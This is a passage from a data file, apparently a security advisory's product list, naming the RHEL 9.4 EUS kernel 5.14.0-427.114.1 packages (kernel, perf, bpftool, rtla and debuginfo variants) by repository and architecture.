"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"AppStream-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"BaseOS-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x",
"BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src",
"CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x",
"CRB-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64",
"CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le",
